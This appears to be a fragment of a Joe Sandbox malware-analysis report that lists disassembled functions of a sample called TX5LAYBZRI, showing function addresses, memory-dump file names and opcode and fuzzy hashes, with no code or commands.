                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                            • Instruction ID: ac25e8d9300c646d82393b73c89f2296cfff323d3b616ba99a0d2ff1d435ca3e
                                            • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                            • Instruction Fuzzy Hash: 9731C23170A3194BC714ADAAC4C036AF6D39BDC360F55863DE589C3384E9718C88AA82
                                            Function 00E4AB2C Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                            • Instruction ID: 6db4fc34319f58503854e150ec04aab72c8e9518d6b70015f9e0ce21dbd9cbd1
                                            • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                            • Instruction Fuzzy Hash: B9F04F73BA56290BA360CDB66D011D7A2C3A7C0770F1F9569EC84E7542E9349C4686C6
                                            Function 00E4AAC0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                            • Instruction ID: cbadcd40dbbc83f85162931122ef495b6997b8b5292eedb803c801c6da173839
                                            • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                            • Instruction Fuzzy Hash: BFF08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC979ECA0E7206E930EC0656D1
                                            Function 00D79980 Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e33912ca4d1b147a9e871143e37d9b1a79061582bf56623de8956d506c44f5b7
                                            • Instruction ID: 1bec72e4fbdb280d7e726a648ddd9d7a2dcae1bbc217e598b65449640cf9b1f3
                                            • Opcode Fuzzy Hash: e33912ca4d1b147a9e871143e37d9b1a79061582bf56623de8956d506c44f5b7
                                            • Instruction Fuzzy Hash: 84B01232D012008B6716C93CE8710D172F273D1310396D4E8D00345004E735D0028F00
                                            Function 00BF6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [
                                            • API String ID: 0-784033777
                                            • Opcode ID: 9f5b9476e6c6a79130fe00440bbbc2c336ddb2b9938bb553857b9ec5b97cee7f
                                            • Instruction ID: c956e9e8e9e9b66a9c2cabded67701dad4e733d7cef069b103449f6772b9063a
                                            • Opcode Fuzzy Hash: 9f5b9476e6c6a79130fe00440bbbc2c336ddb2b9938bb553857b9ec5b97cee7f
                                            • Instruction Fuzzy Hash: 66B1567190838D6BDB399A2488D277BBBD8EB55304F1845ADEFC5C7182EB79C84C8352